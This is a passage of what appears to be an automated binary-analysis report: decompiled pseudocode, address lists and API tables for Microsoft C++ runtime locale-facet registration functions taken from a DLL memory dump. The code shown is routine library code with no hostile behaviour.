																			 *((intOrPtr*)( *((intOrPtr*)( *_t762 + 4))))();
																			 *0x6d546df0 = _t762;
																			goto L33;
																		}
																	} else {
																		_t762 = _t781;
																		goto L33;
																	}
																}
															} else {
																_t761 =  *(_t814 - 0x10);
																 *(_t814 - 0x10) = _t761;
																 *(_t814 - 4) = 1;
																E6D486FD3(__eflags, _t761);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t761 + 4))))();
																 *0x6d546dbc = _t761;
																goto L26;
															}
														} else {
															_t761 = _t780;
															goto L26;
														}
													}
												} else {
													_t760 =  *(_t814 - 0x10);
													 *(_t814 - 0x10) = _t760;
													 *(_t814 - 4) = 1;
													E6D486FD3(__eflags, _t760);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t760 + 4))))();
													 *0x6d546dec = _t760;
													goto L19;
												}
											} else {
												_t760 = _t779;
												goto L19;
											}
										}
									} else {
										_t759 =  *(_t814 - 0x10);
										 *(_t814 - 0x10) = _t759;
										 *(_t814 - 4) = 1;
										E6D486FD3(__eflags, _t759);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t759 + 4))))();
										 *0x6d546db8 = _t759;
										goto L12;
									}
								} else {
									_t759 = _t778;
									goto L12;
								}
							}
						} else {
							_t758 =  *(_t814 - 0x10);
							 *(_t814 - 0x10) = _t758;
							 *(_t814 - 4) = 1;
							E6D486FD3(__eflags, _t758);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t758 + 4))))();
							 *0x6d546de8 = _t758;
							goto L5;
						}
					} else {
						_t758 = _t777;
						goto L5;
					}
				}
			}

0x6d48f183
0x6d48f183
0x6d48f18a
0x6d48f194
0x6d48f199
0x6d48f1a4
0x6d48f1a8
0x6d48f1ab
0x6d48f1b0
0x6d48f1b4
0x6d48f1b9
0x6d48f1bd
0x6d48f202
0x6d48f205
0x6d48f211
0x6d48f1bf
0x6d48f1c1
0x6d48f1c7
0x6d48f1cd
0x6d48f1d5
0x6d48f1d8
0x6d48f215
0x6d48f223
0x6d48f228
0x6d48f230
0x6d48f23a
0x6d48f23f
0x6d48f24a
0x6d48f24e
0x6d48f251
0x6d48f256
0x6d48f25f
0x6d48f261
0x6d48f263
0x6d48f2a8
0x6d48f2ab
0x6d48f2b7
0x6d48f265
0x6d48f265
0x6d48f267
0x6d48f26d
0x6d48f273
0x6d48f27b
0x6d48f27e
0x6d48f2bb
0x6d48f2c9
0x6d48f2ce
0x6d48f2d6
0x6d48f2e0
0x6d48f2e5
0x6d48f2f0
0x6d48f2f4
0x6d48f2f7
0x6d48f2fc
0x6d48f305
0x6d48f307
0x6d48f309
0x6d48f34e
0x6d48f351
0x6d48f35d
0x6d48f30b
0x6d48f30b
0x6d48f30d
0x6d48f313
0x6d48f319
0x6d48f321
0x6d48f324
0x6d48f361
0x6d48f36f
0x6d48f374
0x6d48f37c
0x6d48f386
0x6d48f38b
0x6d48f396
0x6d48f39a
0x6d48f39d
0x6d48f3a2
0x6d48f3ab
0x6d48f3ad
0x6d48f3af
0x6d48f3f4
0x6d48f3f7
0x6d48f403
0x6d48f3b1
0x6d48f3b1
0x6d48f3b3
0x6d48f3b9
0x6d48f3bf
0x6d48f3c7
0x6d48f3ca
0x6d48f407
0x6d48f415
0x6d48f41a
0x6d48f422
0x6d48f42c
0x6d48f431
0x6d48f43c
0x6d48f440
0x6d48f443
0x6d48f448
0x6d48f451
0x6d48f453
0x6d48f455
0x6d48f49a
0x6d48f49d
0x6d48f4a9
0x6d48f457
0x6d48f457
0x6d48f459
0x6d48f45f
0x6d48f465
0x6d48f46d
0x6d48f470
0x6d48f4ad
0x6d48f4bb
0x6d48f4c0
0x6d48f4c8
0x6d48f4d2
0x6d48f4d7
0x6d48f4e2
0x6d48f4e6
0x6d48f4e9
0x6d48f4ee
0x6d48f4f7
0x6d48f4f9
0x6d48f4fb
0x6d48f540
0x6d48f543
0x6d48f54f
0x6d48f4fd
0x6d48f4fd
0x6d48f4ff
0x6d48f505
0x6d48f50b
0x6d48f513
0x6d48f516
0x6d48f553
0x6d48f561
0x6d48f566
0x6d48f56e
0x6d48f578
0x6d48f57d
0x6d48f588
0x6d48f58c
0x6d48f58f
0x6d48f594
0x6d48f59d
0x6d48f59f
0x6d48f5a1
0x6d48f5e6
0x6d48f5e9
0x6d48f5f5
0x6d48f5a3
0x6d48f5a3
0x6d48f5a5
0x6d48f5ab
0x6d48f5b1
0x6d48f5b9
0x6d48f5bc
0x6d48f5f9
0x6d48f607
0x6d48f60c
0x6d48f614
0x6d48f61e
0x6d48f623
0x6d48f62e
0x6d48f632
0x6d48f635
0x6d48f63a
0x6d48f643
0x6d48f645
0x6d48f647
0x6d48f68c
0x6d48f68f
0x6d48f69b
0x6d48f649
0x6d48f649
0x6d48f64b
0x6d48f651
0x6d48f657
0x6d48f65f
0x6d48f662
0x6d48f69f
0x6d48f6ad
0x6d48f6b2
0x6d48f6ba
0x6d48f6c4
0x6d48f6c9
0x6d48f6d4
0x6d48f6d8
0x6d48f6db
0x6d48f6e0
0x6d48f6e9
0x6d48f6eb
0x6d48f6ed
0x6d48f732
0x6d48f735
0x6d48f741
0x6d48f6ef
0x6d48f6ef
0x6d48f6f1
0x6d48f6f7
0x6d48f6fd
0x6d48f705
0x6d48f708
0x6d48f745
0x6d48f753
0x6d48f758
0x6d48f760
0x6d48f76a
0x6d48f76f
0x6d48f77a
0x6d48f77e
0x6d48f781
0x6d48f786
0x6d48f78f
0x6d48f791
0x6d48f793
0x6d48f7d8
0x6d48f7db
0x6d48f7e7
0x6d48f795
0x6d48f795
0x6d48f797
0x6d48f79d
0x6d48f7a3
0x6d48f7ab
0x6d48f7ae
0x6d48f7eb
0x6d48f7f9
0x6d48f7fe
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f835
0x6d48f837
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d
0x6d48f7b0
0x6d48f7b0
0x6d48f7b3
0x6d48f7b7
0x6d48f7bb
0x6d48f7c8
0x6d48f7d0
0x6d48f7d2
0x00000000
0x6d48f7d2
0x6d48f799
0x6d48f799
0x00000000
0x6d48f799
0x6d48f797
0x6d48f70a
0x6d48f70a
0x6d48f70d
0x6d48f711
0x6d48f715
0x6d48f722
0x6d48f72a
0x6d48f72c
0x00000000
0x6d48f72c
0x6d48f6f3
0x6d48f6f3
0x00000000
0x6d48f6f3
0x6d48f6f1
0x6d48f664
0x6d48f664
0x6d48f667
0x6d48f66b
0x6d48f66f
0x6d48f67c
0x6d48f684
0x6d48f686
0x00000000
0x6d48f686
0x6d48f64d
0x6d48f64d
0x00000000
0x6d48f64d
0x6d48f64b
0x6d48f5be
0x6d48f5be
0x6d48f5c1
0x6d48f5c5
0x6d48f5c9
0x6d48f5d6
0x6d48f5de
0x6d48f5e0
0x00000000
0x6d48f5e0
0x6d48f5a7
0x6d48f5a7
0x00000000
0x6d48f5a7
0x6d48f5a5
0x6d48f518
0x6d48f518
0x6d48f51b
0x6d48f51f
0x6d48f523
0x6d48f530
0x6d48f538
0x6d48f53a
0x00000000
0x6d48f53a
0x6d48f501
0x6d48f501
0x00000000
0x6d48f501
0x6d48f4ff
0x6d48f472
0x6d48f472
0x6d48f475
0x6d48f479
0x6d48f47d
0x6d48f48a
0x6d48f492
0x6d48f494
0x00000000
0x6d48f494
0x6d48f45b
0x6d48f45b
0x00000000
0x6d48f45b
0x6d48f459
0x6d48f3cc
0x6d48f3cc
0x6d48f3cf
0x6d48f3d3
0x6d48f3d7
0x6d48f3e4
0x6d48f3ec
0x6d48f3ee
0x00000000
0x6d48f3ee
0x6d48f3b5
0x6d48f3b5
0x00000000
0x6d48f3b5
0x6d48f3b3
0x6d48f326
0x6d48f326
0x6d48f329
0x6d48f32d
0x6d48f331
0x6d48f33e
0x6d48f346
0x6d48f348
0x00000000
0x6d48f348
0x6d48f30f
0x6d48f30f
0x00000000
0x6d48f30f
0x6d48f30d
0x6d48f280
0x6d48f280
0x6d48f283
0x6d48f287
0x6d48f28b
0x6d48f298
0x6d48f2a0
0x6d48f2a2
0x00000000
0x6d48f2a2
0x6d48f269
0x6d48f269
0x00000000
0x6d48f269
0x6d48f267
0x6d48f1da
0x6d48f1da
0x6d48f1dd
0x6d48f1e1
0x6d48f1e5
0x6d48f1f2
0x6d48f1fa
0x6d48f1fc
0x00000000
0x6d48f1fc
0x6d48f1c3
0x6d48f1c3
0x00000000
0x6d48f1c3
0x6d48f1c1

APIs

__EH_prolog3.LIBCMT ref: 6D48F18A
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F194
int.LIBCPMT ref: 6D48F1AB

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

messages.LIBCPMT ref: 6D48F1CE
std::_Facet_Register.LIBCPMT ref: 6D48F1E5
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F205
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F223

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 6568c177ef03cc1c69da668d0257a6c78a776307162f9c4b66e8a415c6206e7a
Instruction ID: 5a99b7f65265759ffd0d48feef9e49f569a695555c07ad6fd3f20d62cac4975f
Opcode Fuzzy Hash: 6568c177ef03cc1c69da668d0257a6c78a776307162f9c4b66e8a415c6206e7a
Instruction Fuzzy Hash: 9011E0768082599BCF05EBA0C840EEDB774AF90314F2A400DD612AB395DB70ED00C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48A059, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48A059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v28;
				char _v32;
				void* _t77;
				intOrPtr* _t78;
				void* _t90;
				void* _t103;
				void* _t116;
				void* _t129;
				intOrPtr* _t196;
				intOrPtr* _t215;
				intOrPtr* _t216;
				intOrPtr* _t217;
				intOrPtr* _t218;
				void* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr* _t223;
				void* _t224;

				_t212 = __edx;
				_t161 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653( &_v20, 0);
				_t220 =  *0x6d546cd8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t220;
				_t77 = E6D46161C(0x6d546cc4);
				_t164 = _a8;
				_t78 = E6D46171B(_a8, _t77);
				_t214 = _t78;
				if(_t78 != 0) {
					L5:
					E6D4866BA( &_v20);
					return E6D4A0075(_t214);
				} else {
					if(_t220 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D48A96A(__ebx, _t164, __edx, _t214, _t220) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438( &_v32);
							E6D4A3D74( &_v32, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t214, _t220, 0x14);
							E6D486653( &_v20, 0);
							_t221 =  *0x6d546cc8; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t221;
							_t90 = E6D46161C(0x6d546b38);
							_t171 = _a8;
							_t215 = E6D46171B(_a8, _t90);
							__eflags = _t215;
							if(_t215 != 0) {
								L12:
								E6D4866BA( &_v20);
								return E6D4A0075(_t215);
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6D48A9D2(_t161, _t171, __edx, _t215, _t221) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438( &_v32);
										E6D4A3D74( &_v32, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t161, _t215, _t221, 0x14);
										E6D486653( &_v20, 0);
										_t222 =  *0x6d546ccc; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t222;
										_t103 = E6D46161C(0x6d546cb8);
										_t178 = _a8;
										_t216 = E6D46171B(_a8, _t103);
										__eflags = _t216;
										if(_t216 != 0) {
											L19:
											E6D4866BA( &_v20);
											return E6D4A0075(_t216);
										} else {
											__eflags = _t222;
											if(_t222 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6D48AA38(_t161, _t178, __edx, _t216, _t222) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438( &_v32);
													E6D4A3D74( &_v32, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t161, _t216, _t222, 0x14);
													E6D486653( &_v20, 0);
													_t223 =  *0x6d546cd0; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t223;
													_t116 = E6D46161C(0x6d546cbc);
													_t185 = _a8;
													_t217 = E6D46171B(_a8, _t116);
													__eflags = _t217;
													if(_t217 != 0) {
														L26:
														E6D4866BA( &_v20);
														return E6D4A0075(_t217);
													} else {
														__eflags = _t223;
														if(_t223 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6D48AAA0(_t161, _t185, _t212, _t217, _t223) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438( &_v32);
																E6D4A3D74( &_v32, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t161, _t217, _t223, 0x14);
																E6D486653( &_v20, 0);
																_t224 =  *0x6d546cd4; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t224;
																_t129 = E6D46161C(0x6d546cc0);
																_t192 = _a8;
																_t218 = E6D46171B(_a8, _t129);
																__eflags = _t218;
																if(_t218 != 0) {
																	L33:
																	E6D4866BA( &_v20);
																	return E6D4A0075(_t218);
																} else {
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E6D48AB08(_t161, _t192, _t212, _t218, _t224) - 0xffffffff;
																		if(__eflags == 0) {
																			_t196 =  &_v32;
																			E6D461438(_t196);
																			E6D4A3D74( &_v32, 0x6d543504);
																			asm("int3");
																			_push(_t196);
																			 *((intOrPtr*)(_t196 + 4)) = _v12;
																			_v28 = _t196;
																			 *_t196 = 0x6d4eba24;
																			return _t196;
																		} else {
																			_t218 = _v16;
																			_v16 = _t218;
																			_v4 = 1;
																			E6D486FD3(__eflags, _t218);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 4))))();
																			 *0x6d546cd4 = _t218;
																			goto L33;
																		}
																	} else {
																		_t218 = _t224;
																		goto L33;
																	}
																}
															} else {
																_t217 = _v16;
																_v16 = _t217;
																_v4 = 1;
																E6D486FD3(__eflags, _t217);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4))))();
																 *0x6d546cd0 = _t217;
																goto L26;
															}
														} else {
															_t217 = _t223;
															goto L26;
														}
													}
												} else {
													_t216 = _v16;
													_v16 = _t216;
													_v4 = 1;
													E6D486FD3(__eflags, _t216);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t216 + 4))))();
													 *0x6d546ccc = _t216;
													goto L19;
												}
											} else {
												_t216 = _t222;
												goto L19;
											}
										}
									} else {
										_t215 = _v16;
										_v16 = _t215;
										_v4 = 1;
										E6D486FD3(__eflags, _t215);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t215 + 4))))();
										 *0x6d546cc8 = _t215;
										goto L12;
									}
								} else {
									_t215 = _t221;
									goto L12;
								}
							}
						} else {
							_t214 = _v16;
							_v16 = _t214;
							_v4 = 1;
							E6D486FD3(__eflags, _t214);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t214 + 4))))();
							 *0x6d546cd8 = _t214;
							goto L5;
						}
					} else {
						_t214 = _t220;
						goto L5;
					}
				}
			}

0x6d48a059
0x6d48a059
0x6d48a060
0x6d48a06a
0x6d48a06f
0x6d48a07a
0x6d48a07e
0x6d48a081
0x6d48a086
0x6d48a08a
0x6d48a08f
0x6d48a093
0x6d48a0d8
0x6d48a0db
0x6d48a0e7
0x6d48a095
0x6d48a097
0x6d48a09d
0x6d48a0a3
0x6d48a0ab
0x6d48a0ae
0x6d48a0eb
0x6d48a0f9
0x6d48a0fe
0x6d48a106
0x6d48a110
0x6d48a115
0x6d48a120
0x6d48a124
0x6d48a127
0x6d48a12c
0x6d48a135
0x6d48a137
0x6d48a139
0x6d48a17e
0x6d48a181
0x6d48a18d
0x6d48a13b
0x6d48a13b
0x6d48a13d
0x6d48a143
0x6d48a149
0x6d48a151
0x6d48a154
0x6d48a191
0x6d48a19f
0x6d48a1a4
0x6d48a1ac
0x6d48a1b6
0x6d48a1bb
0x6d48a1c6
0x6d48a1ca
0x6d48a1cd
0x6d48a1d2
0x6d48a1db
0x6d48a1dd
0x6d48a1df
0x6d48a224
0x6d48a227
0x6d48a233
0x6d48a1e1
0x6d48a1e1
0x6d48a1e3
0x6d48a1e9
0x6d48a1ef
0x6d48a1f7
0x6d48a1fa
0x6d48a237
0x6d48a245
0x6d48a24a
0x6d48a252
0x6d48a25c
0x6d48a261
0x6d48a26c
0x6d48a270
0x6d48a273
0x6d48a278
0x6d48a281
0x6d48a283
0x6d48a285
0x6d48a2ca
0x6d48a2cd
0x6d48a2d9
0x6d48a287
0x6d48a287
0x6d48a289
0x6d48a28f
0x6d48a295
0x6d48a29d
0x6d48a2a0
0x6d48a2dd
0x6d48a2eb
0x6d48a2f0
0x6d48a2f8
0x6d48a302
0x6d48a307
0x6d48a312
0x6d48a316
0x6d48a319
0x6d48a31e
0x6d48a327
0x6d48a329
0x6d48a32b
0x6d48a370
0x6d48a373
0x6d48a37f
0x6d48a32d
0x6d48a32d
0x6d48a32f
0x6d48a335
0x6d48a33b
0x6d48a343
0x6d48a346
0x6d48a380
0x6d48a383
0x6d48a391
0x6d48a396
0x6d48a39a
0x6d48a39e
0x6d48a3a3
0x6d48a3a6
0x6d48a3ad
0x6d48a348
0x6d48a348
0x6d48a34b
0x6d48a34f
0x6d48a353
0x6d48a360
0x6d48a368
0x6d48a36a
0x00000000
0x6d48a36a
0x6d48a331
0x6d48a331
0x00000000
0x6d48a331
0x6d48a32f
0x6d48a2a2
0x6d48a2a2
0x6d48a2a5
0x6d48a2a9
0x6d48a2ad
0x6d48a2ba
0x6d48a2c2
0x6d48a2c4
0x00000000
0x6d48a2c4
0x6d48a28b
0x6d48a28b
0x00000000
0x6d48a28b
0x6d48a289
0x6d48a1fc
0x6d48a1fc
0x6d48a1ff
0x6d48a203
0x6d48a207
0x6d48a214
0x6d48a21c
0x6d48a21e
0x00000000
0x6d48a21e
0x6d48a1e5
0x6d48a1e5
0x00000000
0x6d48a1e5
0x6d48a1e3
0x6d48a156
0x6d48a156
0x6d48a159
0x6d48a15d
0x6d48a161
0x6d48a16e
0x6d48a176
0x6d48a178
0x00000000
0x6d48a178
0x6d48a13f
0x6d48a13f
0x00000000
0x6d48a13f
0x6d48a13d
0x6d48a0b0
0x6d48a0b0
0x6d48a0b3
0x6d48a0b7
0x6d48a0bb
0x6d48a0c8
0x6d48a0d0
0x6d48a0d2
0x00000000
0x6d48a0d2
0x6d48a099
0x6d48a099
0x00000000
0x6d48a099
0x6d48a097

APIs

__EH_prolog3.LIBCMT ref: 6D48A060
std::_Lockit::_Lockit.LIBCPMT ref: 6D48A06A
int.LIBCPMT ref: 6D48A081

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

codecvt.LIBCPMT ref: 6D48A0A4
std::_Facet_Register.LIBCPMT ref: 6D48A0BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48A0DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48A0F9

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: dcc95e8ee0bb650c5e73de5fec24a358982cf597e2bd9543f4d5985ad39bea20
Instruction ID: b5e3fd4975a2125cfaea5dbc4cb621273dd466606c0a356cc3d223e7003aec8a
Opcode Fuzzy Hash: dcc95e8ee0bb650c5e73de5fec24a358982cf597e2bd9543f4d5985ad39bea20
Instruction Fuzzy Hash: 3E11CE768082699BCF01EBA4C841EEDB774AF91314F2A400CD611B7392CBB4DD04C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48A2F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6D48A2F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr* _v12;
				void* _v16;
				char _v20;
				char _v32;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t44;
				void* _t52;

				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653( &_v20, 0);
				_t52 =  *0x6d546cd4; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t52;
				_t21 = E6D46161C(0x6d546cc0);
				_t40 = _a8;
				_t22 = E6D46171B(_a8, _t21);
				_t50 = _t22;
				if(_t22 != 0) {
					L5:
					E6D4866BA( &_v20);
					return E6D4A0075(_t50);
				} else {
					if(_t52 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D48AB08(__ebx, _t40, __edx, _t50, _t52) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v32;
							E6D461438(_t44);
							E6D4A3D74( &_v32, 0x6d543504);
							asm("int3");
							_push(_t44);
							 *((intOrPtr*)(_t44 + 4)) = _a4;
							_v12 = _t44;
							 *_t44 = 0x6d4eba24;
							return _t44;
						} else {
							_t50 = _v16;
							_v16 = _t50;
							_v4 = 1;
							E6D486FD3(__eflags, _t50);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
							 *0x6d546cd4 = _t50;
							goto L5;
						}
					} else {
						_t50 = _t52;
						goto L5;
					}
				}
			}

0x6d48a2f8
0x6d48a302
0x6d48a307
0x6d48a312
0x6d48a316
0x6d48a319
0x6d48a31e
0x6d48a322
0x6d48a327
0x6d48a32b
0x6d48a370
0x6d48a373
0x6d48a37f
0x6d48a32d
0x6d48a32f
0x6d48a335
0x6d48a33b
0x6d48a343
0x6d48a346
0x6d48a380
0x6d48a383
0x6d48a391
0x6d48a396
0x6d48a39a
0x6d48a39e
0x6d48a3a3
0x6d48a3a6
0x6d48a3ad
0x6d48a348
0x6d48a348
0x6d48a34b
0x6d48a34f
0x6d48a353
0x6d48a360
0x6d48a368
0x6d48a36a
0x00000000
0x6d48a36a
0x6d48a331
0x6d48a331
0x00000000
0x6d48a331
0x6d48a32f

APIs

__EH_prolog3.LIBCMT ref: 6D48A2F8
std::_Lockit::_Lockit.LIBCPMT ref: 6D48A302
